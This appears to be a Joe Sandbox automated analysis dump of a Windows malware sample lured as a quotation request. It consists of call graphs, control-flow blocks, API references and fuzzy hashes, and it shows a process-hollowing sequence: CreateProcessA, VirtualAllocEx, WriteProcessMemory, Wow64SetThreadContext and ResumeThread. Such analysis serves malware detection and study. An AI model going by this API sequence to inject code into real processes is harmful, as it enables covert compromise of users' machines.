729a736 2 API calls 23164->23177 23165 729a106 23165->23116 23166->23165 23167->23165 23168->23165 23169->23165 23170->23165 23171->23165 23172->23165 23173->23165 23174->23165 23175->23165 23176->23165 23177->23165 23179 729a8f7 23178->23179 23264 7297178 23179->23264 23268 7297172 23179->23268 23183 729a892 23182->23183 23185 729a96f 23183->23185 23273 7297228 23183->23273 23277 7297222 23183->23277 23184 729af0d 23185->23184 23186 7297178 ResumeThread 23185->23186 23187 7297172 ResumeThread 23185->23187 23186->23185 23187->23185 23281 72973b8 23190->23281 23285 72973c0 23190->23285 23191 729a72a 23191->23134 23197 729a572 23194->23197 23195 729a8dc 23202 7297178 ResumeThread 23195->23202 23203 7297172 ResumeThread 23195->23203 23196 729a584 23196->23134 23197->23195 23197->23196 23198 72973b8 WriteProcessMemory 23197->23198 23199 72973c0 WriteProcessMemory 23197->23199 23289 72972fa 23197->23289 23293 7297300 23197->23293 23198->23197 23199->23197 23202->23195 23203->23195 23205 729aba6 23204->23205 23209 72973b8 WriteProcessMemory 23205->23209 23210 72973c0 WriteProcessMemory 23205->23210 23206 729a8dc 23215 7297178 ResumeThread 23206->23215 23216 7297172 ResumeThread 23206->23216 23207 729a584 23207->23134 23208 729a572 23208->23206 23208->23207 23211 72973b8 WriteProcessMemory 23208->23211 23212 72973c0 WriteProcessMemory 23208->23212 23213 72972fa VirtualAllocEx 23208->23213 23214 7297300 VirtualAllocEx 23208->23214 23209->23208 23210->23208 23211->23208 23212->23208 23213->23208 23214->23208 23215->23206 23216->23206 23297 72974a8 23217->23297 23301 72974b0 23217->23301 23218 729a7d5 23218->23217 23219 729ad89 23218->23219 23305 7297648 23222->23305 23309 729763e 23222->23309 23228 7297228 Wow64SetThreadContext 23226->23228 23229 7297222 Wow64SetThreadContext 23226->23229 23227 729a808 23227->23134 23228->23227 23229->23227 23231 729a8dc 23230->23231 23232 7297178 ResumeThread 23231->23232 23233 7297172 ResumeThread 23231->23233 23232->23231 23233->23231 23235 729aba6 23234->23235 23237 729a572 23234->23237 23239 72973b8 WriteProcessMemory 23235->23239 23240 72973c0 WriteProcessMemory 23235->23240 23236 729a584 23236->23134 23237->23236 23238 729a8dc 23237->23238 23241 72973b8 WriteProcessMemory 23237->23241 23242 72973c0 WriteProcessMemory 23237->23242 23243 72972fa VirtualAllocEx 23237->23243 23244 7297300 VirtualAllocEx 23237->23244 23245 7297178 ResumeThread 23238->23245 23246 7297172 ResumeThread 23238->23246 23239->23237 23240->23237 23241->23237 23242->23237 23243->23237 23244->23237 23245->23238 23246->23238 23248 729ace3 23247->23248 23249 7297178 ResumeThread 23248->23249 23250 7297172 ResumeThread 23248->23250 23249->23248 23250->23248 23252 729aba6 23251->23252 23262 72973b8 WriteProcessMemory 23252->23262 23263 72973c0 WriteProcessMemory 23252->23263 23253 729a584 23253->23134 23254 729a572 23254->23253 23255 729a8dc 23254->23255 23256 72973b8 WriteProcessMemory 23254->23256 23257 72973c0 WriteProcessMemory 23254->23257 23258 72972fa VirtualAllocEx 23254->23258 23259 7297300 VirtualAllocEx 23254->23259 23260 7297178 ResumeThread 23255->23260 23261 7297172 ResumeThread 23255->23261 23256->23254 23257->23254 23258->23254 23259->23254 23260->23255 23261->23255 23262->23254 23263->23254 23265 72971b8 ResumeThread 23264->23265 23267 72971e9 23265->23267 23267->23179 23269 729712f 23268->23269 23270 7297176 ResumeThread 23268->23270 23269->23179 23272 72971e9 23270->23272 23272->23179 23274 729726d Wow64SetThreadContext 23273->23274 23276 72972b5 23274->23276 23276->23185 23278 729726d Wow64SetThreadContext 23277->23278 23280 72972b5 23278->23280 23280->23185 23282 7297408 WriteProcessMemory 23281->23282 23284 729745f 23282->23284 23284->23191 23286 7297408 WriteProcessMemory 23285->23286 23288 729745f 23286->23288 23288->23191 23290 7297300 VirtualAllocEx 23289->23290 23292 729737d 23290->23292 23292->23197 23294 7297340 VirtualAllocEx 23293->23294 23296 729737d 23294->23296 23296->23197 23298 72974fb ReadProcessMemory 23297->23298 23300 729753f 23298->23300 23300->23218 23302 72974fb ReadProcessMemory 23301->23302 23304 729753f 23302->23304 23304->23218 23306 72976d1 CreateProcessA 23305->23306 23308 7297893 23306->23308 23310 72976d1 CreateProcessA 23309->23310 23312 7297893 23310->23312 23322 1364668 23323 136467a 23322->23323 23324 1364686 23323->23324 23326 1364779 23323->23326 23327 136479d 23326->23327 23331 1364878 23327->23331 23335 1364888 23327->23335 23333 1364888 23331->23333 23332 136498c 23333->23332 23339 13644e0 23333->23339 23337 13648af 23335->23337 23336 136498c 23337->23336 23338 13644e0 CreateActCtxA 23337->23338 23338->23336 23340 1365918 CreateActCtxA 23339->23340 23342 13659db 23340->23342 23399 136d3d8 23400 136d41e GetCurrentProcess 23399->23400 23402 136d470 GetCurrentThread 23400->23402 23403 136d469 23400->23403 23404 136d4a6 23402->23404 23405 136d4ad GetCurrentProcess 23402->23405 23403->23402 23404->23405 23408 136d4e3 23405->23408 23406 136d50b GetCurrentThreadId 23407 136d53c 23406->23407 23408->23406 23343 7294076 23344 7294004 23343->23344 23345 7293c78 23344->23345 23348 7296d20 23344->23348 23352 7296d30 23344->23352 23349 7296d30 23348->23349 23356 72970b8 23349->23356 23350 7296dd1 23350->23345 23353 7296d63 23352->23353 23355 72970b8 ResumeThread 23353->23355 23354 7296dd1 23354->23345 23355->23354 23357 72970e8 23356->23357 23358 7297102 23357->23358 23359 7297172 ResumeThread 23357->23359 23358->23350 23359->23358

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0136D456
                                              • GetCurrentThread.KERNEL32 ref: 0136D493
                                              • GetCurrentProcess.KERNEL32 ref: 0136D4D0
                                              • GetCurrentThreadId.KERNEL32 ref: 0136D529
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: b432cea64699ec8bfdea4c1f7fea8edae10c01d52115adc77becd3b603c5fa53
                                              • Instruction ID: 2651e72a0df64a586428792561c3204b0f430be14f2dc916e55c466fe45ecb2c
                                              • Opcode Fuzzy Hash: b432cea64699ec8bfdea4c1f7fea8edae10c01d52115adc77becd3b603c5fa53
                                              • Instruction Fuzzy Hash: CE5166B0A01309CFDB14CFAAD548BDEBBF5AF88304F20C459D489A7391CB349984CB65

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0136D456
                                              • GetCurrentThread.KERNEL32 ref: 0136D493
                                              • GetCurrentProcess.KERNEL32 ref: 0136D4D0
                                              • GetCurrentThreadId.KERNEL32 ref: 0136D529
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: ef47e792fd75bcd596c7c9287ebb87e2205963458482dd2ad1b7fa5af7fbc0e6
                                              • Instruction ID: d6bdfd0c542607eb70f005fa92efca71660b506819b98677f8599bff46c2041c
                                              • Opcode Fuzzy Hash: ef47e792fd75bcd596c7c9287ebb87e2205963458482dd2ad1b7fa5af7fbc0e6
                                              • Instruction Fuzzy Hash: 795155B0A01709CFDB44CFAAD548BDEBBF5AF88304F20C469D449A7350DB74A984CB65

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 44 729763e-72976dd 46 72976df-72976e9 44->46 47 7297716-7297736 44->47 46->47 48 72976eb-72976ed 46->48 52 7297738-7297742 47->52 53 729776f-729779e 47->53 50 72976ef-72976f9 48->50 51 7297710-7297713 48->51 54 72976fb 50->54 55 72976fd-729770c 50->55 51->47 52->53 57 7297744-7297746 52->57 61 72977a0-72977aa 53->61 62 72977d7-7297891 CreateProcessA 53->62 54->55 55->55 56 729770e 55->56 56->51 58 7297769-729776c 57->58 59 7297748-7297752 57->59 58->53 63 7297754 59->63 64 7297756-7297765 59->64 61->62 65 72977ac-72977ae 61->65 75 729789a-7297920 62->75 76 7297893-7297899 62->76 63->64 64->64 66 7297767 64->66 67 72977d1-72977d4 65->67 68 72977b0-72977ba 65->68 66->58 67->62 70 72977bc 68->70 71 72977be-72977cd 68->71 70->71 71->71 72 72977cf 71->72 72->67 86 7297930-7297934 75->86 87 7297922-7297926 75->87 76->75 89 7297944-7297948 86->89 90 7297936-729793a 86->90 87->86 88 7297928 87->88 88->86 92 7297958-729795c 89->92 93 729794a-729794e 89->93 90->89 91 729793c 90->91 91->89 95 729796e-7297975 92->95 96 729795e-7297964 92->96 93->92 94 7297950 93->94 94->92 97 729798c 95->97 98 7297977-7297986 95->98 96->95 100 729798d 97->100 98->97 100->100
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0729787E
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: fb7fcba0ddc55dba6d582f2dcbf3ec6189f601113ad3e8db757dad7f6ed6b33d
                                              • Instruction ID: 088d35d4cfe5d4da9a74b51716d012feab9cc749f31ca69e94cffe1f4c31f8f0
                                              • Opcode Fuzzy Hash: fb7fcba0ddc55dba6d582f2dcbf3ec6189f601113ad3e8db757dad7f6ed6b33d
                                              • Instruction Fuzzy Hash: 73A13BB1D2061ACFEF10CFA8C841BEDBBB2BB44314F1885A9D859A7340D7749A85CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 101 7297648-72976dd 103 72976df-72976e9 101->103 104 7297716-7297736 101->104 103->104 105 72976eb-72976ed 103->105 109 7297738-7297742 104->109 110 729776f-729779e 104->110 107 72976ef-72976f9 105->107 108 7297710-7297713 105->108 111 72976fb 107->111 112 72976fd-729770c 107->112 108->104 109->110 114 7297744-7297746 109->114 118 72977a0-72977aa 110->118 119 72977d7-7297891 CreateProcessA 110->119 111->112 112->112 113 729770e 112->113 113->108 115 7297769-729776c 114->115 116 7297748-7297752 114->116 115->110 120 7297754 116->120 121 7297756-7297765 116->121 118->119 122 72977ac-72977ae 118->122 132 729789a-7297920 119->132 133 7297893-7297899 119->133 120->121 121->121 123 7297767 121->123 124 72977d1-72977d4 122->124 125 72977b0-72977ba 122->125 123->115 124->119 127 72977bc 125->127 128 72977be-72977cd 125->128 127->128 128->128 129 72977cf 128->129 129->124 143 7297930-7297934 132->143 144 7297922-7297926 132->144 133->132 146 7297944-7297948 143->146 147 7297936-729793a 143->147 144->143 145 7297928 144->145 145->143 149 7297958-729795c 146->149 150 729794a-729794e 146->150 147->146 148 729793c 147->148 148->146 152 729796e-7297975 149->152 153 729795e-7297964 149->153 150->149 151 7297950 150->151 151->149 154 729798c 152->154 155 7297977-7297986 152->155 153->152 157 729798d 154->157 155->154 157->157
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0729787E
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 036b23d31c97834382214d8cf51f75dc62bfa92c8df2a5f3d78b9c904dda3799
                                              • Instruction ID: e2f6bde1f72f1f56dbb5a00f3e076117a431966498f06f90b0749c5fcc59ecef
                                              • Opcode Fuzzy Hash: 036b23d31c97834382214d8cf51f75dc62bfa92c8df2a5f3d78b9c904dda3799
                                              • Instruction Fuzzy Hash: 88912AB1D2021ADFEF10CF68C841BEDBBB2BB48314F1485A9D859A7340DB749A85CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 158 136ad48-136ad57 159 136ad83-136ad87 158->159 160 136ad59-136ad66 call 136a0a0 158->160 162 136ad9b-136addc 159->162 163 136ad89-136ad93 159->163 166 136ad7c 160->166 167 136ad68 160->167 169 136adde-136ade6 162->169 170 136ade9-136adf7 162->170 163->162 166->159 215 136ad6e call 136b034 167->215 216 136ad6e call 136afe0 167->216 217 136ad6e call 136afd0 167->217 169->170 171 136ae1b-136ae1d 170->171 172 136adf9-136adfe 170->172 174 136ae20-136ae27 171->174 175 136ae00-136ae07 call 136a0ac 172->175 176 136ae09 172->176 173 136ad74-136ad76 173->166 177 136aeb8-136af34 173->177 180 136ae34-136ae3b 174->180 181 136ae29-136ae31 174->181 178 136ae0b-136ae19 175->178 176->178 208 136af36-136af5e 177->208 209 136af60-136af78 177->209 178->174 184 136ae3d-136ae45 180->184 185 136ae48-136ae51 call 136a0bc 180->185 181->180 184->185 189 136ae53-136ae5b 185->189 190 136ae5e-136ae63 185->190 189->190 191 136ae65-136ae6c 190->191 192 136ae81-136ae85 190->192 191->192 194 136ae6e-136ae7e call 136a0cc call 136a0dc 191->194 196 136ae8b-136ae8e 192->196 194->192 199 136ae90-136aeae 196->199 200 136aeb1-136aeb7 196->200 199->200 208->209 210 136af80-136afab GetModuleHandleW 209->210 211 136af7a-136af7d 209->211 212 136afb4-136afc8 210->212 213 136afad-136afb3 210->213 211->210 213->212 215->173 216->173 217->173
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0136AF9E
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 96375533d71d2a776bf4e1f8203ec007093e1e7cdd60f8fa3ac38ccf2943be7a
                                              • Instruction ID: a4dd6a356f894450a44146c622cc23d0b7fccea38fdf1f7b23624365216f9034
                                              • Opcode Fuzzy Hash: 96375533d71d2a776bf4e1f8203ec007093e1e7cdd60f8fa3ac38ccf2943be7a
                                              • Instruction Fuzzy Hash: 59817A70A00B058FDB24DF69D45075ABBF5FF48208F00892ED48AEBA55D775E849CB90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 218 13644e0-13659d9 CreateActCtxA 221 13659e2-1365a3c 218->221 222 13659db-13659e1 218->222 229 1365a3e-1365a41 221->229 230 1365a4b-1365a4f 221->230 222->221 229->230 231 1365a60 230->231 232 1365a51-1365a5d 230->232 234 1365a61 231->234 232->231 234->234
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 013659C9
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 8eef6e4cca23ef142975db90d8081d0ecaca2729926897a2f422361f071a9aa1
                                              • Instruction ID: 2ad9afa9d82699a67a203d99ed01d5b78040e84af848171bb796347945fdee99
                                              • Opcode Fuzzy Hash: 8eef6e4cca23ef142975db90d8081d0ecaca2729926897a2f422361f071a9aa1
                                              • Instruction Fuzzy Hash: 0741E3B1C0071DCBEB24DFAAC884B9EBBF5BF49304F20846AD409AB255DB716945CF90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 235 136590c-1365910 236 136591c-13659d9 CreateActCtxA 235->236 238 13659e2-1365a3c 236->238 239 13659db-13659e1 236->239 246 1365a3e-1365a41 238->246 247 1365a4b-1365a4f 238->247 239->238 246->247 248 1365a60 247->248 249 1365a51-1365a5d 247->249 251 1365a61 248->251 249->248 251->251
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 013659C9
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 256b62780ff7aa2c27fd6902f8b757030449e81fd6a499158e202f0cff4683f4
                                              • Instruction ID: d219dc7358e36e32dc3350af9521db2f951df50ef65fff9340e564ab9ad6cae6
                                              • Opcode Fuzzy Hash: 256b62780ff7aa2c27fd6902f8b757030449e81fd6a499158e202f0cff4683f4
                                              • Instruction Fuzzy Hash: 6C41FFB1C0071CCBEB24DFAAC884B9EBBF5BF49304F20846AD418AB255DB716945CF90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 252 72973b8-729740e 254 729741e-729745d WriteProcessMemory 252->254 255 7297410-729741c 252->255 257 729745f-7297465 254->257 258 7297466-7297496 254->258 255->254 257->258
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07297450
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 513962221dcf2da87459f07740c590f9e163d7d051ddd429a6e9c890e0d5ed61
                                              • Instruction ID: 8626e50b0ff78cb35572334dcb72f732f7ea7d95eae12b7ba1f12705d3218783
                                              • Opcode Fuzzy Hash: 513962221dcf2da87459f07740c590f9e163d7d051ddd429a6e9c890e0d5ed61
                                              • Instruction Fuzzy Hash: 872135B59103099FDF10CFA9C880BEEBBF1FB48310F14842AE958A7341C7789945CBA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 262 7297172-7297174 263 729712f-7297147 262->263 264 7297176-72971e7 ResumeThread 262->264 267 7297149 263->267 268 729714e-7297152 263->268 272 72971e9-72971ef 264->272 273 72971f0-7297215 264->273 267->268 270 729715a-7297163 268->270 272->273
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 18eaf760a8f1d63b77a0c9d65900b8287e73d3d9a4f9e603673edb5e074e557e
                                              • Instruction ID: c1a8ee083b397b419f2ac094dd26f9d53ebb0419fe07c426926d00d10aa004ca
                                              • Opcode Fuzzy Hash: 18eaf760a8f1d63b77a0c9d65900b8287e73d3d9a4f9e603673edb5e074e557e
                                              • Instruction Fuzzy Hash: 6E2178B19102498FDF10DFA9D8457EEBBF5EB88310F248469D819A7340CA756944CBA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 277 72973c0-729740e 279 729741e-729745d WriteProcessMemory 277->279 280 7297410-729741c 277->280 282 729745f-7297465 279->282 283 7297466-7297496 279->283 280->279 282->283
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07297450
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: fd8f27d406e075d4051616c9fb685f5cf095eb417a04fac5d57b3ed48a398176
                                              • Instruction ID: e233a1006c95aebf4e23ad6f9a93ea63b2425d9c0f7fc07819bb073a0d43970c
                                              • Opcode Fuzzy Hash: fd8f27d406e075d4051616c9fb685f5cf095eb417a04fac5d57b3ed48a398176
                                              • Instruction Fuzzy Hash: 0F2133B19103099FDF10CFAAC880BEEBBF5FB48310F14842AE958A7241C7789944CBA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 287 136d618-136d61c 288 136d662-136d6b4 DuplicateHandle 287->288 289 136d61e-136d65f 287->289 290 136d6b6-136d6bc 288->290 291 136d6bd-136d6da 288->291 289->288 290->291
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0136D6A7
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 61d560de9bf703aefc99834cf9ede28ea790761072243e7f2e790bf6695693d6
                                              • Instruction ID: 93a9ba9492dfce569ad590bed54e90c68bc1fcc0f99a60372398d09ec7f5554b
                                              • Opcode Fuzzy Hash: 61d560de9bf703aefc99834cf9ede28ea790761072243e7f2e790bf6695693d6
                                              • Instruction Fuzzy Hash: 452168B5900249DFDB10CFA9D480BDEBFF4EB08320F24811AE958A7251C378A941CF60

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 294 7297222-7297273 296 7297283-72972b3 Wow64SetThreadContext 294->296 297 7297275-7297281 294->297 299 72972bc-72972ec 296->299 300 72972b5-72972bb 296->300 297->296 300->299
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072972A6
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 5d6bceca88696b54a6620eec40bd486042678f61258bd5d6decff683fcf9849f
                                              • Instruction ID: 87eb7691d752b51d03171b1a13969a7d5bda7d851dde3ee9735e0b00a118bdb3
                                              • Opcode Fuzzy Hash: 5d6bceca88696b54a6620eec40bd486042678f61258bd5d6decff683fcf9849f
                                              • Instruction Fuzzy Hash: 9C2137B1D103099FDB10CFAAC4847EEBBF1EF48310F54842EE459A7241C7789985CBA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 304 72974a8-729753d ReadProcessMemory 307 729753f-7297545 304->307 308 7297546-7297576 304->308 307->308
                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07297530
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: de852172c3d7563b7a04de1d0076f3cce5a818b2284b17f6899b2811f0127c88
                                              • Instruction ID: b99fe5b7f9b8afe3cb9b32dee3f900ba04609c8d035ec97a14b9722c909be0e5
                                              • Opcode Fuzzy Hash: de852172c3d7563b7a04de1d0076f3cce5a818b2284b17f6899b2811f0127c88
                                              • Instruction Fuzzy Hash: 5C2123B1D003499FDB10CFAAC880BEEBBF5FF48310F54842AE959A7250C7789941CBA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 322 72974b0-729753d ReadProcessMemory 325 729753f-7297545 322->325 326 7297546-7297576 322->326 325->326
                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07297530
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 777d727b7ffcb202951375d411e91cc65081947199b7832ad4af45f4f91f87ff
                                              • Instruction ID: f85c5ccca98774badf0f8a4c801eda696fa8641b0be4d0b6f6dcf651d5d5c3ab
                                              • Opcode Fuzzy Hash: 777d727b7ffcb202951375d411e91cc65081947199b7832ad4af45f4f91f87ff
                                              • Instruction Fuzzy Hash: 9F2123B19007499FDF10CFAAC880BEEBBF5FF48310F54842AE959A7251C7789945CBA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 312 7297228-7297273 314 7297283-72972b3 Wow64SetThreadContext 312->314 315 7297275-7297281 312->315 317 72972bc-72972ec 314->317 318 72972b5-72972bb 314->318 315->314 318->317
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072972A6
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: be683cc960f93646fc8881a8ff3d72edc056015a4c85a0a4f98a830100cef5d3
                                              • Instruction ID: 2254a33b8b55e8c6873e5bac58391977b2a395719f3dd3d7cd5cedfa95efff50
                                              • Opcode Fuzzy Hash: be683cc960f93646fc8881a8ff3d72edc056015a4c85a0a4f98a830100cef5d3
                                              • Instruction Fuzzy Hash: 1E2134B1D103099FDB10DFAAC4857EEBBF5EB48310F54842AD859A7241CB789985CBA4
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0136D6A7
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 0830f8ab6bb211fc5d23faf51f3ade9d6480685b813fa1424419c455ba56e870
                                              • Instruction ID: 483795239ebd51f0a89826163647cd3242528c01fd5a1e4ad72df3053812ac6f
                                              • Opcode Fuzzy Hash: 0830f8ab6bb211fc5d23faf51f3ade9d6480685b813fa1424419c455ba56e870
                                              • Instruction Fuzzy Hash: A621E4B5900208DFDB10CFAAD484ADEBBF8FB48320F14802AE958A7350C374A954CF64
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0729736E
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 6d06a8fcefe556b3a04a629220abc08fe52c709f1747ce8542853ac5409d056e
                                              • Instruction ID: 475782016778e72b0bccb84fb4d4245c6bea46ad1277d782f90bddfdb006db40
                                              • Opcode Fuzzy Hash: 6d06a8fcefe556b3a04a629220abc08fe52c709f1747ce8542853ac5409d056e
                                              • Instruction Fuzzy Hash: 641159769003099FDF10DFAAD844BDFBBF5EB48320F148429E959A7250C7759540CFA4
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0136B019,00000800,00000000,00000000), ref: 0136B22A
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 2eda81e2169aa85061e52942de38138058e5a6478f4476723243415e6b8c4224
                                              • Instruction ID: d724083157f5e55f01ef334f8fb37ec0dcf6385fbdc1bd16dc17af5597bf0bab
                                              • Opcode Fuzzy Hash: 2eda81e2169aa85061e52942de38138058e5a6478f4476723243415e6b8c4224
                                              • Instruction Fuzzy Hash: FB1112B69003089FDB10CFAAD444BEEFBF8EB49714F14842AE959A7600C375A545CFA4
                                              APIs
